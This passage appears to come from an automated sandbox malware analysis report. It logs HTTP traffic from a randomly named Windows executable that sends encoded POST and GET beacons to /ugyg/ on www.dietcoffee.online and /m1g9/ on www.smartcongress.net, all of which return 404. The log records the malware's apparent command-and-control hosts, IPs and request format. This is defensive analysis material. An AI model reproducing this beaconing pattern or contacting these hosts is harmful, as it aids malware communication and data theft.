                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.74999877.68.64.45805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:58:47.507723093 CET841OUTPOST /ugyg/ HTTP/1.1
                                                                                  Host: www.dietcoffee.online
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.dietcoffee.online
                                                                                  Referer: http://www.dietcoffee.online/ugyg/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 6c 41 78 43 52 68 77 46 54 70 53 2f 4f 71 52 51 51 79 41 67 31 7a 55 4f 50 55 58 65 44 5a 52 44 63 58 78 51 4b 38 53 63 70 6a 73 33 44 39 43 69 2b 4d 42 69 61 7a 72 51 74 52 32 43 30 77 74 6c 33 2b 4b 73 77 5a 56 70 41 67 61 6b 37 6e 6d 30 71 45 79 44 54 4a 6a 51 75 5a 52 64 4a 54 6b 4f 49 7a 64 66 43 73 52 4d 70 79 42 62 44 78 48 71 6a 73 52 62 77 6a 73 33 30 39 6b 4e 62 36 31 46 4c 6d 70 75 34 72 74 4c 61 4b 44 4e 48 58 38 71 79 52 74 4d 58 45 73 57 58 4d 61 36 46 43 58 66 4b 5a 74 35 6f 69 51 44 6b 62 6c 4b 6a 54 39 63 43 46 46 36 47 37 6c 4f 6f 46 43 66 6c 41 72 31 6e 2b 71 32 6d 68 67 6a 30 66 68 50 36 6b 6f 4f 6c 51 3d 3d
                                                                                  Data Ascii: PHM8hj-=lAxCRhwFTpS/OqRQQyAg1zUOPUXeDZRDcXxQK8Scpjs3D9Ci+MBiazrQtR2C0wtl3+KswZVpAgak7nm0qEyDTJjQuZRdJTkOIzdfCsRMpyBbDxHqjsRbwjs309kNb61FLmpu4rtLaKDNHX8qyRtMXEsWXMa6FCXfKZt5oiQDkblKjT9cCFF6G7lOoFCflAr1n+q2mhgj0fhP6koOlQ==
                                                                                  Dec 9, 2024 06:58:48.580648899 CET391INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.25.3
                                                                                  Date: Mon, 09 Dec 2024 05:58:48 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.74999977.68.64.45805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:58:50.169137955 CET861OUTPOST /ugyg/ HTTP/1.1
                                                                                  Host: www.dietcoffee.online
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.dietcoffee.online
                                                                                  Referer: http://www.dietcoffee.online/ugyg/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 6c 41 78 43 52 68 77 46 54 70 53 2f 66 36 68 51 56 54 41 67 77 54 55 4e 42 30 58 65 4a 35 51 45 63 58 39 51 4b 2b 2b 4d 71 58 41 33 44 63 79 69 77 74 42 69 64 7a 72 51 30 68 32 48 70 41 74 75 33 35 44 47 77 64 56 70 41 67 4f 6b 37 6e 32 30 71 54 6e 78 54 5a 6a 53 6c 35 52 49 55 44 6b 4f 49 7a 64 66 43 74 30 70 70 79 5a 62 44 6b 58 71 67 4e 52 59 75 7a 74 46 69 4e 6b 4e 52 71 31 4a 4c 6d 70 4d 34 6f 70 6c 61 50 48 4e 48 57 4d 71 79 45 52 4e 65 45 73 63 49 63 61 76 56 77 57 67 56 70 38 43 6e 55 59 2f 6b 59 56 56 6d 6c 38 2b 59 6e 4a 57 59 71 64 31 73 48 6d 70 79 6d 32 41 6c 2f 75 75 72 44 55 43 72 6f 45 6c 33 32 4a 4b 7a 6c 45 6c 4b 4d 6b 64 69 61 4e 59 57 78 65 72 37 34 43 77 6c 6c 59 3d
                                                                                  Data Ascii: PHM8hj-=lAxCRhwFTpS/f6hQVTAgwTUNB0XeJ5QEcX9QK++MqXA3DcyiwtBidzrQ0h2HpAtu35DGwdVpAgOk7n20qTnxTZjSl5RIUDkOIzdfCt0ppyZbDkXqgNRYuztFiNkNRq1JLmpM4oplaPHNHWMqyERNeEscIcavVwWgVp8CnUY/kYVVml8+YnJWYqd1sHmpym2Al/uurDUCroEl32JKzlElKMkdiaNYWxer74CwllY=
                                                                                  Dec 9, 2024 06:58:51.388591051 CET391INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.25.3
                                                                                  Date: Mon, 09 Dec 2024 05:58:51 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.75000077.68.64.45805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:58:52.838119030 CET1874OUTPOST /ugyg/ HTTP/1.1
                                                                                  Host: www.dietcoffee.online
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.dietcoffee.online
                                                                                  Referer: http://www.dietcoffee.online/ugyg/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 6c 41 78 43 52 68 77 46 54 70 53 2f 66 36 68 51 56 54 41 67 77 54 55 4e 42 30 58 65 4a 35 51 45 63 58 39 51 4b 2b 2b 4d 71 57 55 33 44 4b 6d 69 77 4f 35 69 63 7a 72 51 72 52 32 47 70 41 74 2f 33 2f 72 43 77 64 59 57 41 6c 4b 6b 70 52 36 30 39 57 62 78 5a 5a 6a 53 71 5a 51 76 4a 54 6b 66 49 79 74 54 43 74 6b 70 70 79 5a 62 44 6a 76 71 32 73 52 59 73 7a 73 33 30 39 6b 52 62 36 30 67 4c 6d 77 37 34 72 45 51 61 37 7a 4e 48 32 63 71 31 32 35 4e 43 55 73 53 4a 63 62 71 56 77 61 42 56 70 78 35 6e 55 45 5a 6b 62 46 56 69 7a 52 43 49 57 35 4c 62 4d 56 74 6a 55 36 2b 78 57 79 69 6b 4d 57 45 71 52 45 48 67 49 34 6b 79 77 6b 45 35 56 55 69 63 38 6f 43 6b 37 42 61 57 6b 6e 56 38 59 75 41 33 51 46 63 45 37 4b 65 42 4a 51 78 72 41 4a 54 4f 72 63 76 57 6a 71 2f 35 38 67 4e 53 49 33 47 64 65 35 37 47 46 73 37 2b 71 77 6a 64 6a 6e 52 43 70 55 52 75 6a 45 68 39 68 66 6d 2f 55 72 4d 37 71 79 74 59 64 4f 61 38 31 78 69 4c 63 76 74 33 35 52 67 6c 47 4a 6b 6b 6d 78 54 6d 58 43 41 50 49 65 66 38 75 [TRUNCATED]
                                                                                  Data Ascii: PHM8hj-=lAxCRhwFTpS/f6hQVTAgwTUNB0XeJ5QEcX9QK++MqWU3DKmiwO5iczrQrR2GpAt/3/rCwdYWAlKkpR609WbxZZjSqZQvJTkfIytTCtkppyZbDjvq2sRYszs309kRb60gLmw74rEQa7zNH2cq125NCUsSJcbqVwaBVpx5nUEZkbFVizRCIW5LbMVtjU6+xWyikMWEqREHgI4kywkE5VUic8oCk7BaWknV8YuA3QFcE7KeBJQxrAJTOrcvWjq/58gNSI3Gde57GFs7+qwjdjnRCpURujEh9hfm/UrM7qytYdOa81xiLcvt35RglGJkkmxTmXCAPIef8uNp1IlFwLMKgbSgt1dcA38KQ1iRBik2c1HzW50G4oA5AGbHLLyikBrr/9svyYah8e7MwWpCVYgJyBF09OWgOuyh96ivM/uMdceC/XIRybmj5NX2YXSu5Tk/SGfPMsk6Ui3HDq3cJ09oXyzxEHCDE8FRYOvWmvhrGaPoWKwmE32Vy+9VJbKjPQjDer2BbISsbduLIA4eipV9U7tE5ZdKTVVnjhLSJBhK8+hpyGtTbuh9Qqsr+BZXzrzNA3yapO8AITFi7Q31O0rbQGzMPridOvXuytSTVnCQvwv1FEMfa1AUoSdlg7mcEHCWFm49Mewy9SA1lVNEMs0cYMWSoJjsXfp86S7dkvskcDaWXIJ+dOuvvSbdHLzpL3et24P973UMaylrm4cFb9MlfEG3X4LIJVjcNLUjKnn8GmnLzy9/nXzoc3iaFDt16CVmW6MsCsgeIagfGfgMM5H4k2QzPCo2d+yTQRuLS1oAAvuYVI7J746jDvMQVEI9RL7HhKdXYV0PIOaz9uPyPpqEHiyiiGkFcLyE9cLVCSzWKYMmg5fJus4ZXZZp1DdMZgSpRTlrTNdtWKy25Cp6cpEyx9ThQErHqmOFVDI4rPImL21nOCNFfkeMn8vlTiJD4NxBJSLj7vOmxRODnhnYMIYbSHQo9rXfBfUom6wxSWZFUTko [TRUNCATED]
                                                                                  Dec 9, 2024 06:58:54.138067961 CET391INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.25.3
                                                                                  Date: Mon, 09 Dec 2024 05:58:54 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.75000177.68.64.45805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:58:55.505780935 CET564OUTGET /ugyg/?tHfx=9byl&PHM8hj-=oCZiSXk+P+GRfK1CTz9r2QoANXD5JZtnUXBBKsmFkR5XdaXHzOV8eQzOlgaiqn8Qx6Xg8OpRPwSVnkrV8FGOE/7M7rIWJSwROyp8WcVtqR88cxmX/+Bsohxbo7MCCLhiJklW/Y5ke4/8 HTTP/1.1
                                                                                  Host: www.dietcoffee.online
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:58:56.729379892 CET373INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.25.3
                                                                                  Date: Mon, 09 Dec 2024 05:58:56 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 67 79 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ugyg/ was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.2.750002146.88.233.115805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:59:03.191852093 CET841OUTPOST /m1g9/ HTTP/1.1
                                                                                  Host: www.smartcongress.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.smartcongress.net
                                                                                  Referer: http://www.smartcongress.net/m1g9/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 50 73 57 46 5a 6e 73 52 39 31 6e 75 65 67 7a 69 2f 6e 43 72 4d 67 62 49 62 4e 54 42 36 2b 4b 43 71 70 5a 70 48 41 30 62 44 2f 50 54 6e 54 6e 52 72 46 5a 42 77 54 74 73 64 4a 4f 65 51 53 56 7a 39 59 4a 58 68 41 73 4a 56 56 66 4a 75 43 52 4a 41 72 39 67 50 70 33 4c 49 59 37 6c 78 59 77 37 72 46 53 57 4b 55 61 57 47 72 67 6f 73 51 62 4e 69 4c 43 74 4b 57 67 6f 72 6c 6e 4a 56 48 4f 35 39 42 55 78 56 4d 7a 4e 32 73 35 72 68 4e 44 77 31 75 66 46 64 33 76 4c 61 6b 63 7a 57 37 71 43 4c 48 32 6c 56 58 56 78 66 54 54 32 64 39 49 6b 4a 35 5a 46 5a 36 70 63 75 62 33 45 57 48 51 6a 35 6a 6b 52 72 52 4b 2f 43 59 49 33 54 6b 53 76 4d 67 3d 3d
                                                                                  Data Ascii: PHM8hj-=PsWFZnsR91nuegzi/nCrMgbIbNTB6+KCqpZpHA0bD/PTnTnRrFZBwTtsdJOeQSVz9YJXhAsJVVfJuCRJAr9gPp3LIY7lxYw7rFSWKUaWGrgosQbNiLCtKWgorlnJVHO59BUxVMzN2s5rhNDw1ufFd3vLakczW7qCLH2lVXVxfTT2d9IkJ5ZFZ6pcub3EWHQj5jkRrRK/CYI3TkSvMg==
                                                                                  Dec 9, 2024 06:59:04.694103003 CET380INHTTP/1.1 404 Not Found
                                                                                  content-type: text/html; charset=iso-8859-1
                                                                                  content-length: 196
                                                                                  date: Mon, 09 Dec 2024 05:59:04 GMT
                                                                                  server: LiteSpeed
                                                                                  x-tuned-by: N0C
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.2.750003146.88.233.115805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:59:05.851443052 CET861OUTPOST /m1g9/ HTTP/1.1
                                                                                  Host: www.smartcongress.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.smartcongress.net
                                                                                  Referer: http://www.smartcongress.net/m1g9/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 50 73 57 46 5a 6e 73 52 39 31 6e 75 50 77 6a 69 73 77 57 72 4c 41 62 4c 65 4e 54 42 78 65 4c 4c 71 70 56 70 48 42 77 4c 44 4a 6e 54 67 7a 58 52 71 47 42 42 7a 54 74 73 57 70 4f 62 50 43 56 34 39 59 56 6c 68 45 73 4a 56 52 2f 4a 75 44 68 4a 41 61 39 76 4f 35 33 4a 44 34 37 6e 73 6f 77 37 72 46 53 57 4b 58 6d 38 47 71 49 6f 76 67 72 4e 6a 76 32 69 55 47 67 72 6f 6c 6e 4a 66 6e 50 77 39 42 55 54 56 49 7a 6a 32 75 42 72 68 50 72 77 30 39 48 47 54 33 76 4a 48 30 64 6b 58 59 65 4e 4a 31 61 31 54 78 42 30 59 44 50 70 63 4c 4a 47 54 62 56 70 48 72 52 6e 71 5a 54 79 42 68 4e 57 37 69 67 4a 6d 7a 2b 65 64 76 74 64 65 32 7a 72 61 52 47 36 63 55 72 32 6e 63 66 75 4e 63 2b 6c 41 56 62 37 6f 4d 38 3d
                                                                                  Data Ascii: PHM8hj-=PsWFZnsR91nuPwjiswWrLAbLeNTBxeLLqpVpHBwLDJnTgzXRqGBBzTtsWpObPCV49YVlhEsJVR/JuDhJAa9vO53JD47nsow7rFSWKXm8GqIovgrNjv2iUGgrolnJfnPw9BUTVIzj2uBrhPrw09HGT3vJH0dkXYeNJ1a1TxB0YDPpcLJGTbVpHrRnqZTyBhNW7igJmz+edvtde2zraRG6cUr2ncfuNc+lAVb7oM8=
                                                                                  Dec 9, 2024 06:59:07.109618902 CET380INHTTP/1.1 404 Not Found
                                                                                  content-type: text/html; charset=iso-8859-1
                                                                                  content-length: 196
                                                                                  date: Mon, 09 Dec 2024 05:59:06 GMT
                                                                                  server: LiteSpeed
                                                                                  x-tuned-by: N0C
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.2.750004146.88.233.115805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:59:08.525784969 CET1874OUTPOST /m1g9/ HTTP/1.1
                                                                                  Host: www.smartcongress.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.smartcongress.net
                                                                                  Referer: http://www.smartcongress.net/m1g9/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 50 73 57 46 5a 6e 73 52 39 31 6e 75 50 77 6a 69 73 77 57 72 4c 41 62 4c 65 4e 54 42 78 65 4c 4c 71 70 56 70 48 42 77 4c 44 4a 76 54 67 41 66 52 73 6d 39 42 79 54 74 73 4b 5a 4f 61 50 43 56 70 39 59 4d 75 68 45 6f 33 56 54 48 4a 2f 52 35 4a 4a 4f 52 76 58 70 33 4a 4d 59 37 6b 78 59 78 37 72 46 43 53 4b 55 65 38 47 71 49 6f 76 69 44 4e 6c 37 43 69 57 47 67 6f 72 6c 6e 46 56 48 4f 56 39 42 64 6b 56 49 33 64 32 65 68 72 68 76 37 77 33 50 66 47 62 33 76 48 45 30 64 73 58 59 44 4e 4a 31 57 44 54 78 64 65 59 43 37 70 63 74 51 73 42 61 78 72 54 4b 45 7a 7a 76 66 4e 49 52 68 56 79 42 38 70 6e 77 47 6e 63 34 74 65 51 6b 2f 31 61 57 44 6f 4e 56 7a 45 2b 65 4c 72 4f 72 72 39 5a 57 7a 4d 2b 5a 55 39 6b 46 37 33 52 58 34 36 63 7a 62 70 72 53 69 36 6d 71 61 73 6a 47 6b 48 71 65 2b 4f 33 45 4f 39 37 2b 69 59 75 63 54 54 6d 6b 30 5a 6b 64 71 33 67 70 6d 66 4f 67 70 73 6a 72 37 46 66 56 68 35 6b 48 51 34 32 51 32 73 38 49 57 54 38 4c 6c 6e 48 49 77 5a 78 71 52 54 77 70 42 47 63 52 31 37 64 38 [TRUNCATED]
